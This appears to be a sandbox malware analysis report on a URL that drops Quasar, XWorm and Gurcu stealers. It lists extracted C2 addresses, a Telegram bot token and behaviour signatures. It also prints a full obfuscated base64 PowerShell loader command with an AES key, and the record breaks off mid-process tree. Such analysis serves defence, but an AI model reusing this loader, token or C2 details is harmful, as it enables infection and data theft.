Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://156.253.250....

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    899s
  • max time network
    901s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250128-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    31-01-2025 02:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://156.253.250.62/uploads/

Score
10/10
gurcuquasarxwormcollectiondiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

Version

5.0

C2

185.241.208.111:7050

Mutex

HiisPb8WWhndkdzw

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7925063320:AAH7uvADOuyr-QvUdoVePbQI9F3yoSZZ45A

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7925063320:AAH7uvADOuyr-QvUdoVePbQI9F3yoSZZ45A/sendMessage?chat_id=-4773407783

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Quasar RAT 6 IoCs

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 3 IoCs
    defense_evasion
  • Modifies registry class 34 IoCs
  • NTFS ADS 9 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://156.253.250.62/uploads/"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3388
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://156.253.250.62/uploads/
      2⤵
      • Quasar RAT
      • Checks processor information in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1652 -prefsLen 27175 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {757f7931-1556-4a01-8919-62312f3d408b} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" gpu
        3⤵
          PID:4884
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28095 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {017a8694-c326-437d-a1dc-0dfbc1a55b29} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" socket
          3⤵
          • Checks processor information in registry
          PID:1604
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -childID 1 -isForBrowser -prefsHandle 3132 -prefMapHandle 2908 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ab1a9e1-2ca9-4d48-92bb-ad088227561e} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
          3⤵
            PID:5000
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3668 -childID 2 -isForBrowser -prefsHandle 3652 -prefMapHandle 3648 -prefsLen 32585 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad1d91f5-949b-4e7c-9c22-f279743a798f} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
            3⤵
              PID:2932
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4216 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4276 -prefMapHandle 4292 -prefsLen 32585 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0138ab17-2273-43e2-9f7a-7fc3f0ce744b} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" utility
              3⤵
              • Checks processor information in registry
              PID:3424
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5720 -childID 3 -isForBrowser -prefsHandle 5708 -prefMapHandle 5712 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d9cf4e9-295d-4e71-be72-f8fb8e564243} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
              3⤵
                PID:2584
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5692 -childID 4 -isForBrowser -prefsHandle 5864 -prefMapHandle 5872 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67b6bf37-7df6-4d06-a8f7-c77b03a09624} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                3⤵
                  PID:2824
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6032 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15a812d8-ff44-4239-ab2d-041dae250fef} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                  3⤵
                    PID:1652
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3556 -childID 6 -isForBrowser -prefsHandle 3816 -prefMapHandle 3812 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ac1986d-0185-4f6a-bb9c-a0f518dc5cf5} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                    3⤵
                      PID:2160
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3412 -childID 7 -isForBrowser -prefsHandle 5220 -prefMapHandle 3640 -prefsLen 28087 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c150ea6-eb8d-4a3f-b2e8-9676d9761ebc} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                      3⤵
                        PID:2368
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6616 -childID 8 -isForBrowser -prefsHandle 1548 -prefMapHandle 6988 -prefsLen 28143 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3279612e-4255-4c7c-9941-3782bc85ba6b} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                        3⤵
                          PID:4344
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4184 -childID 9 -isForBrowser -prefsHandle 3812 -prefMapHandle 5676 -prefsLen 28387 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86934e46-46b8-4c4d-b9a7-2275645196dc} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                          3⤵
                            PID:6736
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3568 -childID 10 -isForBrowser -prefsHandle 7648 -prefMapHandle 7652 -prefsLen 28387 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e4a5724-67d8-4372-919d-c190a168ab6e} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                            3⤵
                              PID:6728
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4180 -childID 11 -isForBrowser -prefsHandle 1444 -prefMapHandle 7084 -prefsLen 28387 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb0fa2f4-1835-4269-a33d-6704e0709dfb} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                              3⤵
                                PID:3588
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6684 -childID 12 -isForBrowser -prefsHandle 4544 -prefMapHandle 7092 -prefsLen 28508 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad945fb4-87d8-4028-8fdb-5ebfff54f442} 2904 "\\.\pipe\gecko-crash-server-pipe.2904" tab
                                3⤵
                                  PID:7004
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\remcos_a.vbs"
                              1⤵
                              • Checks computer location settings
                              PID:1648
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WordDoc.bat" "
                                2⤵
                                  PID:3664
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\WordDoc.bat"
                                    3⤵
                                      PID:4636
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGQ9InpWcnJiOXJJRnYrOFY5ci9ZZFpDd3Q0WWwiICsiQWVsYlZhVmxoTFNScnBwMlVDVGU0WFFhbSIgKyJJUDRLMnhXWHNJNFZiNTMvZWNlZGhqWXdLIiArImh1OUxsZyt2SG5QZnZQR2JTeVRMeWVCQkgiICsiaE0wWGZKMnk1Q0h3V0VxKy9mZ3ZBcjhGVCIgKyJlaGMzdHJ5SC95Tit2aWFjWmJZMmQyQThVIiArIjl3Ujk2UitsVUV6eFBxc2JxYjB4aS9heHIiICsiNWxNZkpHaGJYSmpSTVdmVzZmcHdHUXJWMyIgKyI1TmdaRytMVFZjQzltZkdtOWdBYy9wLzFZIiArIjN3bG54eXRaekFoZHUzQjBZNFdxMjVaY2giICsiK25ySit3Q1V0WTVMRjNWamVPZUJBdG1TVyIgKyJYUFdseWVaM280SDFndkhHcEh1UW5nNi93IiArImdWMDBZWlR5SklpbVkxS2J4LzR5TEZ1WWYiICsiNTRVdUNvVE1vMGw4VWR3V0lpdXJZRWUxKyIgKyJKVjh5cDZpTDh5dXhZdHc5QWx2OXBxcVdOIiArIlM4L21penhPZys4UldqYy8zZnpDUEV3Z08iICsidkRNV1NlWTNiRkpjTjFpbm5NMmJOMHZ3eiIgKyJ4ekZRVXpqeFVEaHQ1bFIyVXFLVzFUV1ZBIiArIk9VN3ZoK0FsUmxwVWY3U2hubmFycTV6N1MiICsieEltb1ZFYnRnSVp0U3pxb2pSc29oTTFCdCIgKyJJTTh0NG5XWUxKa3pKaVBwUnhWQU5NL2RoIiArIjl2SkZtN0Q5WUtOeHNDTkpsTzhUL2ZpZHEiICsicEpnVEJoSE8vZzdlZzJEdnh4Tlo2NFd0SiIgKyJaTEM3aU9RMmk4Zm01YlhXWENhU0RSWTZJIiArInhlVnJ5Mmxlc0VrUXNZdDFST2VCMTBsVE4iICsicjhQMTdaZEFSRTJDWmx3ZWxNdncwcGcxMyIgKyIrN3FEdU9TMGFiNjNyemdHZUwzeStEMEdkIiArIkp4NE9JcDZBUGdNRnA1am9YOUpEZ0I5YlgiICsiZFZmVmpzMjE2QWRZTW9RbDlXNUkwOVFsLyIgKyJlVjlHSGd1R1RBYU10OGxuU2dOMUtmT2tzIiArImZpdHA2cmVyME1lZURSbEdzRWpjdE9WTzYiICsiQjhnR1p2UFFnbm5iOVpqaFlNQytnSVpydiIgKyJrbytCejk2dkI4RlVpNis3RmE3bzBqQ0VTIiArImdDTUhsaUViOUFGQTQ0Z1NVRFJEQkJPRXkiICsicnMxWHdSc2ptc283anlNcVRURk1USzVCSCIgKyJJb2xQbTE3Zm9lczM0TFBidHVreENkSTcyIiArImlxRXBoSGNReHR3bHQwSENselJFTnl0b2YiICsiYjh5dnZJbUlsOG8xazBZUElwNEZhb2VUZCIgKyJJWkRVVlVFSitReXpvUUFGTHJNazUwTGU3IiArIkhBWllNeTdIelBNemxPS1dpZnBjRW5EVm0iICsiY2NxSlZXekhEWExQNEMyUDR6QzFTQU1rcyIgKyJHa1NMeU8vRzRkeFFycHJHbWttSERMWEtDIiArIlVnc2lFU3IyR0NYK2ZHWFJENThTcHRBc04iICsiNW1tbUQvM2dVV3BqSmFEaEw0aFd4UmorTiIgKyJ5U1VOQUtXZ0RhRytUNENISUNkVUNTajNxIiArIm9LL01MdDNWTlZydVZ5VmlOb3lTdWxFb1MiICsiUFZOYVNndUxpT3M0UnRmcENBc090VlZqYSIgKyIvQ0g2ZkFCVVBtbXM5YTh1MSt6Vm5LVERvIiArIko3R0hndDdETTFRKysvaXg5ZG9seDQvdFYiICsiM2g5M2NMcnEyTnhmeXJlWDRyckdWNWJKKyIgKyJLK2xWL1ZHa2w3SnE5T1NTTFVEaEQ0dk1UIiArIldoU0ZMY2haZjI5MThaZXVOdUpjNjlBeE4iICsiMUpyY1ZzTk01YWtoZStUTlh1VEZQbmIvOCIgKyIvUE9vSHQxaGY0Y2lIbkFMcmpIeWRsSTNWIiArIi9NQmNnSzJzanlpZW0zRVhRa1Z4V2lsbEYiICsibWcxUk8yMkIvRXRHL25TM2c3U1VKWk15VSIgKyJjWmlycG9UUFdHWUFGVU5BYWhYeVFPYWttIiArInN5QXc4OWpvc2FkZUVKcTN5VHAwem1wR1UiICsibzBwYUp5WGZPV2h0QkVMZE5PT1c3c1k2ZiIgKyJoWjIyb0lqN1FVQkh3QXkxRjJzeFVOVEk5IiArImE2cUljMnVlQmxkUndFdlpKUEY1a1dkRSsiICsiNjFBNzFzRHQyOXo1TXQ3aGVxdThiV1RvYiIgKyJvb3NpaE9FZnBsY2FmTVNCQlBYalVyemVWIiArIkZxRVlpazRHMi9NVk1rREJQRG55REhnZFciICsiNXF5dmxNd2tHVWpKS0E0QlNxYjVJVWpSeCIgKyJBZ1ZyWVZWN0hFRjJnOUtjaTVWTjhnY1NUIiArIkRMRG9ML2lkSlE3TDc0OXZQRWxtT21ubnIiICsiTmpOR1U2SVkzeGYwV3lvSnhTUEkxQjNMRCIgKyIzN0FKVUhzaEdMKytBUDkyYXd3ZDZpc01KIiArIkRBbHlkSEFJVFpLTm9ld2tWeFo4L2dqRHUiICsibktmWVRCUVBoOUtpZ0w5MUNoSkR0elpjSSIgKyJXSVd4K2NTZU1RMVFkeHVvNlRGS1EzSng1IiArImRiVW9VbnZsYjhkUDMwNmU2cVF4eVFoaE0iICsiT1Axak50Q2tQRXFiTnJXVjVZQWc2WWZoaCIgKyJaeXNDSVducDFham1SdnhNaGtjZ2hjaGJhIiArIkhRQlVKRWFhR0FsYlp0STNBbU5yK2F1dUkiICsiS0hpY25WYmVWY1hyUFV4ek9tRFBwWVd3ciIgKyJpSWxPaDk2di9mKzArdCtHZlordjd1NUd2IiArImE2bi92L3hZZy9Ib3ZmbTJOdGlKamxvQWoiICsiZHkzcElvQ0RlaXlsQkREREhHOWR1TnB3cyIgKyJrTjh2cEJaSUpHMVZWbTBUakJ5RzZUQmhIIiArIm9NaGkxQVNzUlh4WXBqekhybGx4RDFIdjkiICsiNTZXd09QUmhGTXpPQzZCUGZWQUdLSE5DSiIgKyJHamd0NEVPUUljSVJMOFZPdTRVY3hTU05tIiArIlBzVUVvdllBKzRpRVRIQnVyaGlpYjVoZloiICsiQUw3aW1WaUhIeHNwbThsTXIyeUt5eURSUSIgKyJHY2hiT2daK3BVdDRPbEFJZGxHcTVvVWxFIiArIkZieGoxUmNYSjRJak9jY2xKMnl3SUJvdSsiICsiOXNZK3JNcnlYZEp1T1Z0TDJ0N2FucDJLRSIgKyJCNjlPVlJIWkZDV2RuVFdydDVXRmVEYXg0IiArInpBSUVHc01tVG8wckdhd2ZZR0lsS2xpa1QiICsiaXhvSE5qZ2h1cyt5VzM0ZDdSYUNDMWlteiIgKyJCei9vYjVoRVdJWVA1WTE2dWVTMDVld0MvIiArIjR1TndwRDkzY1pzNFNuME9DSW5wMDRoLzkiICsiUkRNWFkvNmFLZUhRRldhUUExYVJtSWN0NSIgKyIydDlWZlhiY1dqck83VXN4b05FVVVMbGd5IiArIkQ5SVVUMWV3TDJsQW5sYzd3cXF5WjNQblgiICsiM0ZVMFkwWGExdTJBeGRQRG5NTVZGcmJkaiIgKyJZcVYrWFJRS1Z4SzhnNlladFlIVVM2UDUrIiArIlRsMWsxQVY1MjdWSDFJU2o0SVZjZHJmbHYiICsiRmszNUROOGVIVzNtR3pZN3NTR3BCZzd1RCIgKyJiSWtnRUhjOTdjRnZmYm9sUEFwMGozbmowIiArIlZCcWpTcVBZNDNOS2wyejR4RjBqZm9KSEEiICsiUERqS1ppM1o1cUJTUmdzTXF5dDBOUzNtTSIgKyJFeVNCS3lDT2htVE81bmpHcTJBUHlMTytQIiArInlNVys0RS9QejVLaEY1c1U1bnZ5SUphY0giICsiUmtQaDlZbWc5dWpGQnk3RnJ3c3hicEhGUiIgKyJEWDlyeW5oTmE2b2JDSDR5dkNsNHdUeDdOIiArIi90aXNtSlB1WmdIK3llS0hIN1lTSFVqMUQiICsiSm41aHpUVkMvYmRVWnRuRHNaSjJtdHh0cSIgKyJiZXRQUFRNM255b003M1hodG5kK1paeEN2IiArIkhLVUFPdEtyZUFFVzhzUC9CR3ljejR0bVUiICsiTlhjcGFqMXVWSlNrVXJKbUNsUnZublp2byIgKyJMUmJpM3VvZlVwTGQwc1B5MWhDbWxkM3lwIiArIjBGUnhubDRsK2wvc0Z1cXpWOVFWdmRvNloiICsiVWRGL2hQZEYyY3RPTXZkYnpWV0xIUm00eSIgKyJFWUI5NWV6VVl1c01rT20wb2REK1U4Q20xIiArIitsaUVhN3pPUURRMEJ2ZVZlTk0zLzd6cmEiICsieUFyTCszYTFXanFXQlphV1B5TVN1RndrVSIgKyJnbzFIOHp4amJ5K0xUWDhKR3c2bz0iOyRkPVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZCk7JG1zPU5ldy1PYmplY3QgSU8uTWVtb3J5U3RyZWFtKCwkZCk7JGRzPU5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbSgkbXMsW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyRzcj1OZXctT2JqZWN0IElPLlN0cmVhbVJlYWRlcigkZHMpO2lleCAkc3IuUmVhZFRvRW5kKCk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDg7ZnVuY3Rpb24gbm5oZ3koJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1p6MzY4Qlpid05RYXVPYk90SmdhU2QyM01qVmdyUExvZDZTcHBmRTJNNVU9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3RGbG55eFJMK2k3ZTVnZEhxWXFnaHc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gbHVyZmEoJHBhcmFtX3Zhcil7CUlFWCAnJG9reXhyPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHpwdGNnPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckeXdreXA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkb2t5eHIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJHl3a3lwLkNvcHlUbygkenB0Y2cpOwkkeXdreXAuRGlzcG9zZSgpOwkkb2t5eHIuRGlzcG9zZSgpOwkkenB0Y2cuRGlzcG9zZSgpOwkkenB0Y2cuVG9BcnJheSgpO31mdW5jdGlvbiB2eWl1dygkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckc29oenM9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR3ZHBqaz0kc29oenMuQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckd2RwamsuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSR0ZHcgPSAkZW52OlVTRVJOQU1FOyR3YnVldiA9ICdDOlxVc2Vyc1wnICsgJHRkdyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHdidWV2OyRjeXN6aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHdidWV2KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcW5vIGluICRjeXN6aCkgewlpZiAoJHFuby5TdGFydHNXaXRoKCc6OicpKQl7CQkkaGZ3aGc9JHFuby5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kbHljZ2U9W3N0cmluZ1tdXSRoZndoZy5TcGxpdCgnXCcpO0lFWCAnJG5lendnPWx1cmZhIChubmhneSAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRseWNnZVswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRob3Jqbj1sdXJmYSAobm5oZ3kgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkbHljZ2VbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7dnlpdXcgJG5lendnICRudWxsO3Z5aXV3ICRob3JqbiAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | Invoke-Expression"
                                        4⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops startup file
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:1708
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\6.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:4060
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WordDoc.bat" "
                                    2⤵
                                      PID:4748
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\WordDoc.bat"
                                        3⤵
                                          PID:1048
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
